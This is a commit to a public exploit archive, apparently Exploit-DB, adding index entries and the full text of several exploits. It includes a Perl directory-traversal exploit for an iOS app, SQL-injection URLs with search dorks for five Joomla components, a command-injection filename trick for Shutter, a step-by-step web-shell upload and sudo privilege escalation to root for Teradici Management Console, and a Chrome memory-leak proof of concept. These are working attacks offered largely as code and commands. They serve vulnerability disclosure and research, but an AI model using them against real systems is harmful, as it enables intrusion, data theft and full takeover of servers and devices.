DB: 2017-02-23

13 new exploits EasyCom For PHP 4.0.0 - Buffer Overflow (PoC) EasyCom For PHP 4.0.0 - Denial of Service Google Chrome - 'layout' Out-of-Bounds Read Shutter 0.93.1 - Code Execution DiskSavvy Enterprise - GET Buffer Overflow (Metasploit) Disk Savvy Enterprise - GET Buffer Overflow (Metasploit) Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH) Joomla! Component ContentMap 1.3.8 - 'contentid' Parameter SQL Injection Joomla! Component VehicleManager 3.9 - SQL Injection Joomla! Component RealEstateManager 3.9 - SQL Injection Joomla! Component BookLibrary 3.6.1 - SQL Injection Joomla! Component MediaLibrary Basic 3.5 - SQL Injection Lock Photos Album&Videos Safe 4.3 - Directory Traversal ProjectSend r754 - Insecure Direct Object Reference Teradici Management Console 2.2.0 - Privilege Escalation
2017-02-23 05:01:18 +00:00 · 2017-02-23 05:01:18 +00:00 · c7c1c7d92e
commit c7c1c7d92e
parent ad7bd81657
14 changed files with 954 additions and 1 deletions
--- a/files.csv
+++ b/files.csv
@ -5379,6 +5379,9 @@ id,file,description,date,author,platform,type,port
 41421,platforms/multiple/dos/41421.txt,"Adobe Flash - SWF Stack Corruption",2017-02-21,"Google Security Research",multiple,dos,0
 41422,platforms/multiple/dos/41422.txt,"Adobe Flash - Use-After-Free in Applying Bitmap Filter",2017-02-21,"Google Security Research",multiple,dos,0
 41423,platforms/multiple/dos/41423.txt,"Adobe Flash - YUVPlane Decoding Heap Overflow",2017-02-21,"Google Security Research",multiple,dos,0
 41425,platforms/windows/dos/41425.txt,"EasyCom For PHP 4.0.0 - Buffer Overflow (PoC)",2017-02-22,hyp3rlinx,windows,dos,0
 41426,platforms/windows/dos/41426.txt,"EasyCom For PHP 4.0.0 - Denial of Service",2017-02-22,hyp3rlinx,windows,dos,0
 41434,platforms/multiple/dos/41434.html,"Google Chrome - 'layout' Out-of-Bounds Read",2017-02-22,"Google Security Research",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -8813,6 +8816,7 @@ id,file,description,date,author,platform,type,port
 41321,platforms/windows/local/41321.txt,"Cimetrics BACnet Explorer 4.0 - XML External Entity Injection",2017-02-12,LiquidWorm,windows,local,0
 41349,platforms/windows/local/41349.py,"ShadeYouVPN Client 2.0.1.11 - Privilege Escalation",2017-02-14,"Kacper Szurek",windows,local,0
 41356,platforms/linux/local/41356.txt,"ntfs-3g - Unsanitized modprobe Environment Privilege Escalation",2017-02-14,"Google Security Research",linux,local,0
 41435,platforms/linux/local/41435.txt,"Shutter 0.93.1 - Code Execution",2016-12-26,Prajith,linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15279,7 +15283,7 @@ id,file,description,date,author,platform,type,port
 41041,platforms/linux/remote/41041.rb,"Cisco Firepower Management Console 6.0 - Post Authentication UserAdd",2017-01-13,Metasploit,linux,remote,0
 41073,platforms/windows/remote/41073.py,"WinaXe Plus 8.7 - Buffer Overflow",2017-01-16,"Peter Baris",windows,remote,0
 41079,platforms/windows/remote/41079.rb,"DiskBoss Enterprise - GET Buffer Overflow (Metasploit)",2017-01-16,Metasploit,windows,remote,80
-41146,platforms/windows/remote/41146.rb,"DiskSavvy Enterprise - GET Buffer Overflow (Metasploit)",2017-01-23,Metasploit,windows,remote,80
+41146,platforms/windows/remote/41146.rb,"Disk Savvy Enterprise - GET Buffer Overflow (Metasploit)",2017-01-23,Metasploit,windows,remote,80
 41148,platforms/windows/remote/41148.html,"Cisco WebEx - 'nativeMessaging' Arbitrary Remote Command Execution",2017-01-24,"Google Security Research",windows,remote,0
 41151,platforms/windows/remote/41151.rb,"Mozilla Firefox < 50.0.2 - 'nsSMILTimeContainer::NotifyTimeChange()' Remote Code Execution (Metasploit)",2017-01-24,Metasploit,windows,remote,0
 41153,platforms/windows/remote/41153.rb,"Geutebrueck GCore 1.3.8.42/1.4.2.37 - Remote Code Execution (Metasploit)",2017-01-24,"Maurice Popp",windows,remote,0
@ -15291,6 +15295,7 @@ id,file,description,date,author,platform,type,port
 41298,platforms/hardware/remote/41298.txt,"F5 BIG-IP SSL Virtual Server - Memory Disclosure",2017-02-10,"Ege Balci",hardware,remote,0
 41358,platforms/php/remote/41358.rb,"Piwik 2.14.0 / 2.16.0 / 2.17.1 / 3.0.1 - Superuser Plugin Upload (Metasploit)",2017-02-14,Metasploit,php,remote,80
 41366,platforms/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote,0
 41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -37341,3 +37346,11 @@ id,file,description,date,author,platform,type,port
 41415,platforms/hardware/webapps/41415.rb,"Sonicwall 8.1.0.2-14sv - 'extensionsettings.cgi' Remote Command Injection (Metasploit)",2016-12-25,xort,hardware,webapps,0
 41416,platforms/hardware/webapps/41416.rb,"Sonicwall 8.1.0.2-14sv - 'viewcert.cgi' Remote Command Injection (Metasploit)",2016-12-24,xort,hardware,webapps,0
 41424,platforms/php/webapps/41424.rb,"AlienVault OSSIM/USM <= 5.3.1 - Remote Code Execution (Metasploit)",2017-01-31,"Mehmet Ince",php,webapps,0
 41427,platforms/php/webapps/41427.txt,"Joomla! Component ContentMap 1.3.8 - 'contentid' Parameter SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
 41428,platforms/php/webapps/41428.txt,"Joomla! Component VehicleManager 3.9 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
 41429,platforms/php/webapps/41429.txt,"Joomla! Component RealEstateManager 3.9 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
 41430,platforms/php/webapps/41430.txt,"Joomla! Component BookLibrary 3.6.1 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
 41431,platforms/php/webapps/41431.txt,"Joomla! Component MediaLibrary Basic 3.5 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0
 41432,platforms/ios/webapps/41432.txt,"Lock Photos Album&Videos Safe 4.3 - Directory Traversal",2017-02-21,Vulnerability-Lab,ios,webapps,0
 41433,platforms/php/webapps/41433.txt,"ProjectSend r754 - Insecure Direct Object Reference",2017-02-21,Vulnerability-Lab,php,webapps,0
 41437,platforms/linux/webapps/41437.txt,"Teradici Management Console 2.2.0 - Privilege Escalation",2017-02-22,hantwister,linux,webapps,0
--- a/platforms/ios/webapps/41432.txt
+++ b/platforms/ios/webapps/41432.txt
@ -0,0 +1,205 @@
 Document Title:
 ===============
 Lock Photos Album&Videos Safe v4.3 - Directory Traversal Vulnerability
 References (Source):
 ====================
 https://www.vulnerability-lab.com/get_content.php?id=2032
 Release Date:
 =============
 2017-02-21
 Vulnerability Laboratory ID (VL-ID):
 ====================================
 2032
 Common Vulnerability Scoring System:
 ====================================
 7.8
 Product & Service Introduction:
 ===============================
 You can lock and manage your private photos, videos, text messages, voice recordings, notes, documents and other files very easily! You can store 
 and view PDF, Text(can be created and edited), PowerPoint, Word, Excel, Html, Pages, Key, Numbers and play music very simply! You can as well do 
 more things in one app and manage your life better!
 (Copy of the Homepage: https://itunes.apple.com/us/app/lock-photos-album-video.s/id448033053 )
 Abstract Advisory Information:
 ==============================
 The vulnerability laboratory core research team discovered a remote directory traversal vulnerability in the official Galaxy Studio Lock Photos Album & Videos Safe v4.3 iOS mobile application.
 Vulnerability Disclosure Timeline:
 ==================================
 2017-02-21: Public Disclosure (Vulnerability Laboratory)
 Discovery Status:
 =================
 Published
 Affected Product(s):
 ====================
 Galaxy Studio (Mo Wellin)
 Product: Lock Photos Album & Videos Safe - iOS Mobile (Web-Application) 4.3
 Exploitation Technique:
 =======================
 Remote
 Severity Level:
 ===============
 High
 Technical Details & Description:
 ================================
 A directory traversal vulnerability has been dsicovered in the official Galaxy Studio Lock Photos Album & Videos Safe v4.3 iOS mobile application.
 The security vulnerability allows an attackers to unauthorized request and download local application files by usage of manipulated path parameters.
 The directory traversal web vulnerability is located in the `PRE` parameter of the wifi web-server interface. Remote attackers are able to request 
 the local web-server during the sharing process to access unauthenticated application files. Attackers are able to request via form action path 
 variables to access, download or upload arbitrary files. Remote attackers are able to access the sql-lite database file that own the web-server 
 access credentials of the application. After the download the attacker is able to access the database management system file to use the credentials 
 for unauthorized access via protocol. The PRE request with the action form variable allows to inject any path of the local file system without check 
 for privileges or user access rights. Thus allows an attacker to bypass the local path restriction to compromise the mobile ios web-server application.
 The request method to inject is GET and the attack vector is located on the client-side of the web-server web-application. Finally an attacker is able 
 to access with the credentials the service by using a client via http protocol.
 The security risk of the directory traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.8. 
 Exploitation of the web vulnerability requires no privilege web-application user account or user interaction. Successful exploitation of the 
 vulnerability results in information leaking, mobile application compromise by unauthorized and unauthenticated access.
 Request Method(s):
 [+] GET
 Vulnerable Module(s):
 [+] PRE
 Vulnerable Parameter(s):
 [+] form action
 Affected Module(s):
 [+] Web-Server File System
 Proof of Concept (PoC):
 =======================
 The security vulnerability can be exploited by remote attackers without user interaction or privilege web-application user account.
 For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
 Standard Request:
 http://localhost:5555/?PRE=action form
 PoC: Payload
 //..//..//..//..//..//..//..//..//%00
 /../../../../../../../../%00
 PoC: Exploitation
 http://localhost:5555/?PRE=action form=/../../../../../../../../%00
 PoC: Exploit
 use strict;
 use LWP::UserAgent;
 my $b = LWP::UserAgent->new();
 my $host = "localhost:5555";
 print $b->get("http://".$host."/?PRE=action form=/../../../../../../../../%00")->content;
 --- PoC Session Logs [GET] ---
 Status: 200[OK]
 GET http://localhost:5555/?PRE=action%20form=//..//..//..//..//..//..//..//..//%00 Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:5555]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
   Response Header:
      Date[Di., 21 Feb. 2017 09:21:48 GMT]
      Accept-Ranges[bytes]
      Content-Length[0]
 PoC: Vulnerable Source
 {
  "paths" : [
    "/Picture/Public/path/All Image/"
  ],
  "folder" : "/Picture/Public/path",
  "code" : 1
 }
 ... manipulated
 {
  "paths" : [
  ],
  "folder" : "/../../../../../../../../%00",
  "code" : 1
 }
 Reference(s):
 http://localhost:5555/
 http://localhost:5555/?PRE
 Solution - Fix & Patch:
 =======================
 The security vulnerability can be resolved by disallowing users to access the upper path for root privileges. Ensure that the form 
 action request denies to access web-server data or application configuration files. Parse and restrict the form action parameter to 
 prevent further directory traversal attacks.
 Security Risk:
 ==============
 The security risk of the directory traversal web vulnerability in the mobile web-server application is estimated as high. (CVSS 7.8)
 Credits & Authors:
 ==================
 Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
 Disclaimer & Information:
 =========================
 The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
 or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
 in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
 or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for 
 consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, 
 deface websites, hack into databases or trade with stolen data.
 Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
 Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
 Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
 Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
 Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
 Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
 Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
 Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
 of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
 				    Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
--- a/platforms/linux/local/41435.txt
+++ b/platforms/linux/local/41435.txt
@ -0,0 +1,26 @@
 # Exploit Title: Shutter user-assisted remote code execution
 # Date: 2016-12-26
 # Software Link: http://shutter-project.org/
 # Version: 0.93.1
 # Tested on: Ubuntu,  Debian
 # Exploit Author: Prajith P
 # Website: http://prajith.in/
 # Author Mail: me@prajith.in
 # CVE: CVE-2016-10081
 1. Description.
   /usr/bin/shutter in Shutter through 0.93.1 allows user-assisted remote
 attackers to execute arbitrary commands via a crafted image name that is
 mishandled during a "Run a plugin" action.
 2. Proof of concept.
   1) Rename an image to something like "$(firefox)"
   2) Open the renamed file in shutter
   3) Click the "Run a plugin" option and select any plugin from the list and click "Run"
 3. Solution:
  https://bugs.launchpad.net/shutter/+bug/1652600
 Thanks,
 Prajithh
--- a/platforms/linux/webapps/41437.txt
+++ b/platforms/linux/webapps/41437.txt
@ -0,0 +1,66 @@
 # Exploit Title: Teradici Management Console 2.2.0 - Web Shell Upload and Privilege Escalation
 # Date: February 22nd, 2017
 # Exploit Author: hantwister
 # Vendor Homepage: http://www.teradici.com/products-and-solutions/pcoip-products/management-console
 # Software Link: https://techsupport.teradici.com/ics/support/DLRedirect.asp?fileID=63583 (login required)
 # Version: 2.2.0
 Users that can access the Settings > Database Management page can achieve code
 execution as root on older versions of PCoIP MC 2.x. (Based on CentOS 7 x64)
 Web Shell Upload Vulnerability Overview
 ---------------------------------------
 Database archives are extracted under /opt/jetty/tmpdeploy. By creating a
 malicious archive with a malicious web script that extracts to the known
 directory /opt/jetty/tmpdeploy/jetty-0.0.0.0-8080-console.war-_console-any-
 it is possible to add or modify class files and XML files pertaining to the
 application.
 Privilege Escalation Vulnerability Overview
 -------------------------------------------
 The jetty user owns the file /opt/jetty/jetty_self_restart.sh, and the same user
 has sudo rights to run that file without a password. By manipulating this file,
 arbitrary code can be run as root.
 Exploiting The Vulnerabilities
 ------------------------------
 alice:~$ mkdir -p runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images
 alice:~$ cd runasroot
 alice:~/runasroot$ msfvenom (snip) > evil
 alice:~/runasroot$ chmod a+x evil
 alice:~/runasroot$ nano modify_self_restart.sh
 #!/bin/bash
 echo /tmp/evil >> /opt/jetty/jetty_self_restart.sh
 alice:~/runasroot$ chmod a+x modify_self_restart.sh
 alice:~/runasroot$ cd jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images
 alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ nano runasroot.gsp
 <html>
 <head>
 <title>runasroot</title>
 </head>
 <body>
 <pre>
 <% out << "cp /opt/jetty/tmpdeploy/evil /tmp/".execute().text %>
 <% out << "/opt/jetty/tmpdeploy/modify_self_restart.sh".execute().text %>
 <% out << "sudo /opt/jetty/jetty_self_restart.sh".execute().text %>
 </pre>
 </body>
 </html>
 alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ cd ../../..
 alice:~/runasroot$ tar -zcf runasroot.tar.gz evil modify_self_restart.sh jetty-0.0.0.0-8080-console.war-_console-any-
 alice:~/runasroot$ openssl enc -e -aes-256-cbc -salt -in runasroot.tar.gz -out runasroot.archive -pass pass:4400Dominion -p
 Now, choose to upload runasroot.archive through the Database Management page. An
 error will be displayed that it wasn't a valid archive. Now, navigate to
 https://IP/console/images/runasroot.gsp
--- a/platforms/multiple/dos/41434.html
+++ b/platforms/multiple/dos/41434.html
@ -0,0 +1,29 @@
 <!--
 Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1024
 Chrome bug:
 https://bugs.chromium.org/p/chromium/issues/detail?id=671328
 PoC:
 -->
 <style>
 content { contain: size layout; }
 </style>
 <script>
 function leak() {
 document.execCommand("selectAll"); 
 opt.text = ""; 
 }
 </script>
 <body onload=leak()>
 <content>
 <select>
 <option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option>
 </select>
 </content>
 <!--
 Since this is a layout bug AFAIK the leaked data can't be obtained via DOM calls, however it's possible to obtain it using tricks like unicode-range CSS descriptor (credits to Jann Horn for coming up with that approach) which is likely sufficient to turn this into an ASLR bypass.
 -->
--- a/platforms/php/webapps/41427.txt
+++ b/platforms/php/webapps/41427.txt
@ -0,0 +1,17 @@
 # # # # # 
 # Exploit Title: Joomla! Component ContentMap v1.3.8 - SQL Injection
 # Google Dork: inurl:index.php?option=com_contentmap
 # Date: 22.02.2017
 # Vendor Homepage: https://www.turismo.eu/
 # Software Buy: https://extensions.joomla.org/extensions/extension/maps-a-weather/geotagging/contentmap/
 # Demo: https://www.turismo.eu/itinerari.html
 # Version: 1.3.8
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/index.php?option=com_contentmap&owner=plugin&view=smartloader&id=10135&Itemid=606&type=json&filename=articlesmarkers&source=article&contentid=[SQL]
 # # # # #
--- a/platforms/php/webapps/41428.txt
+++ b/platforms/php/webapps/41428.txt
@ -0,0 +1,22 @@
 # # # # # 
 # Exploit Title: Joomla! Component VehicleManager v3.9 - SQL Injection
 # Google Dork: inurl:index.php?option=com_vehiclemanager
 # Date: 22.02.2017
 # Vendor Homepage: http://ordasoft.com/
 # Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/vehicles/vehiclemanager-basic/
 # Demo: http://ordasvit.com/joomla-vehicle-manager/
 # Version: 3.9
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=all&vcondition=[SQL]
 # http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=all&transmission=[SQL]
 # http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=all&listing_type=[SQL]
 # http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=all&model=[SQL]
 # http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=&fuel_type=[SQL]
 # http://localhost/[PATH]/index.php?option=com_vehiclemanager&Itemid=70&task=search&submit=Search&catid=0&maker=[SQL]
 # # # # #
--- a/platforms/php/webapps/41429.txt
+++ b/platforms/php/webapps/41429.txt
@ -0,0 +1,18 @@
 # # # # # 
 # Exploit Title: Joomla! Component RealEstateManager v3.9 - SQL Injection
 # Google Dork: inurl:index.php?option=com_realestatemanager
 # Date: 22.02.2017
 # Vendor Homepage: http://ordasoft.com/
 # Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/realestatemanager-basic/
 # Demo: http://ordasvit.com/joomla-real-estate-manager/
 # Version: 3.9
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/index.php/realestate/all-houses/all-houses-default/160/search?searchtext=a&catid=all&search_date_from=2017-02-21&search_date_until=2017-02-28&pricefrom2=114019&priceto2=750000&listing_type=all&listing_status=[SQL]
 # http://localhost/[PATH]/index.php/realestate/all-houses/all-houses-default/160/search?searchtext=a&catid=all&search_date_from=2017-02-21&search_date_until=2017-02-28&pricefrom2=114019&priceto2=750000&listing_type=[SQL]
 # # # # #
--- a/platforms/php/webapps/41430.txt
+++ b/platforms/php/webapps/41430.txt
@ -0,0 +1,18 @@
 # # # # # 
 # Exploit Title: Joomla! Component BookLibrary v3.6.1 - SQL Injection
 # Google Dork: inurl:index.php?option=com_booklibrary
 # Date: 22.02.2017
 # Vendor Homepage: http://ordasoft.com/
 # Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/booklibrary-basic/
 # Demo: http://ordasvit.com/joomla-book-library
 # Version: 3.6.1
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/index.php?option=com_booklibrary&task=suggestion&comment=[SQL]
 # http://localhost/[PATH]/index.php/component/booklibrary/0/search?searchtext=[SQL]&author=on&title=on&isbn=on'&bookid=on&description=on&publisher=on&pricefrom=19&priceto=287.9&catid=0&option=com_booklibrary&task=search&Itemid=207
 # # # # #
--- a/platforms/php/webapps/41431.txt
+++ b/platforms/php/webapps/41431.txt
@ -0,0 +1,18 @@
 # # # # # 
 # Exploit Title: Joomla! Component MediaLibrary Basic v3.5 - SQL Injection
 # Google Dork: inurl:index.php?option=com_booklibrary
 # Date: 22.02.2017
 # Vendor Homepage: http://ordasoft.com/
 # Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/medialibrary-basic/
 # Demo: http://ordasvit.com/joomla-media-library/
 # Version: 3.5
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/index.php/medialibrary/media/all-books/all-books/345/view/book/19[SQL]/Ihsan_Sencan
 # http://localhost/[PATH]/index.php/medialibrary/media/all-books/all-books/345/lend_request?mid[0]=[SQL]
 # # # # #
--- a/platforms/php/webapps/41433.txt
+++ b/platforms/php/webapps/41433.txt
@ -0,0 +1,157 @@
 Document Title:
 ===============
 ProjectSend r754 - IDOR & Authentication Bypass Vulnerability
 References (Source):
 ====================
 https://www.vulnerability-lab.com/get_content.php?id=2031
 Release Date:
 =============
 2017-02-21
 Vulnerability Laboratory ID (VL-ID):
 ====================================
 2031
 Common Vulnerability Scoring System:
 ====================================
 5.3
 Product & Service Introduction:
 ===============================
 ProjectSend is a self-hosted application (you can install it easily on your own VPS or shared web hosting account) that lets 
 you upload files and assign them to specific clients that you create yourself! Secure, private and easy. No more depending 
 on external services or e-mail to send those files.
 (Copy of the Homepage: http://www.projectsend.org/ )
 Abstract Advisory Information:
 ==============================
 The vulnerability laboratory core research team discovered a idor and authentication bypass vulnerability in the ProjectSend-r754 web-application.
 Vulnerability Disclosure Timeline:
 ==================================
 2017-02-20: Public Disclosure (Vulnerability Laboratory)
 Discovery Status:
 =================
 Published
 Affected Product(s):
 ====================
 GNU GPL License
 Product: ProjectSend r754
 Exploitation Technique:
 =======================
 Remote
 Severity Level:
 ===============
 Medium
 Technical Details & Description:
 ================================
 An insecure direct object references occured in case of an application provides direct access to objects based on user-supplied input. 
 As a result of this vulnerability attackers can bypass authorization and to access resources in the system. Insecure Direct Object References 
 allows attackers to bypass authorization and access resources directly by modifying the value of a parameter[client] used. Thus finally point 
 to other client account names, which allows an attackers to download others clients private data with no secure method provided.
 Vulnerability Method(s):
 [+] GET
 Vulnerable Module(s):
 [+] process.php?do=zip_download
 Vulnerable Parameter(s):
 [+] client
 [+] file
 Proof of Concept (PoC):
 =======================
 The security vulnerability can be exploited by remote attackers with low privilege web-application user account and low user interaction.
 For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
 1. User "A" as attacker checks a file to download as zip extension, then click download to modifiy values as required ...
 2. Application responds with the client file list, so then you are able to download all other side user B data files with zip extension  
 --- PoC Session Logs ---
 GET /ProjectSend-r754/process.php?do=zip_download&client=[CLIENTNAME]&files%5B%5D=2 HTTP/1.1
 Host: localhost
 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0
 Accept: */*
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 X-Requested-With: XMLHttpRequest
 Referer: http://localhost/ProjectSend-r754/my_files/
 Cookie: PHPSESSID=kb0uotq6mssklf213v4a7fje47
 Connection: keep-alive
 -
 HTTP/1.1 200 OK
 Date: Sun, 05 Feb 2017 19:07:41 GMT
 Server: Apache/2.2.22 (Debian)
 X-Powered-By: PHP/5.4.44-0+deb7u1
 Expires: Sat, 26 Jul 1997 05:00:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate, max-age=0
 Pragma: no-cache
 Vary: Accept-Encoding
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: text/html
 Content-Length: 6
 Name of Files: .jpg
 Video PoC:
 https://www.youtube.com/watch?v=Xc6Jg9I7Pj4
 Security Risk:
 ==============
 The security risk of the web vulnerability in the ProjectSend-r754 web-application function is estimated as medium. (CVSS 5.3)
 Credits & Authors:
 ==================
 Lawrence Amer - Vulnerability Laboratory [Research Team] - (http://lawrenceamer.me) (https://www.vulnerability-lab.com/show.php?user=Lawrence Amer)
 Disclaimer & Information:
 =========================
 The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
 or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
 in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
 or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for 
 consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, 
 deface websites, hack into databases or trade with stolen data.
 Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
 Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
 Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
 Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
 Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
 Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
 Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
 Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
 of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
 				    Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
--- a/platforms/windows/dos/41425.txt
+++ b/platforms/windows/dos/41425.txt
@ -0,0 +1,167 @@
 [+] Credits: John Page AKA Hyp3rlinX
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:  http://hyp3rlinx.altervista.org/advisories/EASYCOM-PHP-API-BUFFER-OVERFLOW.txt
 [+] ISR: ApparitionSec             
 Vendor:
 ================
 easycom-aura.com
 Product:
 ===========================
 EASYCOM AS400 (iBMI) PHP API 
 EasycomPHP_4.0029.iC8im2.exe
 EASYCOM is the middleware which provides native access to IBMi data and programs. With its excellent performance and strict compliance
 with IBMi security regulations, this technology facilitates development of Internet, mobile and client/server applications in
 Windows, Linux, and IBMi.
 EasyCom tested here requires older version of PHP.
 Setup test environment:
 Windows 7
 XAMPP 1.7.3
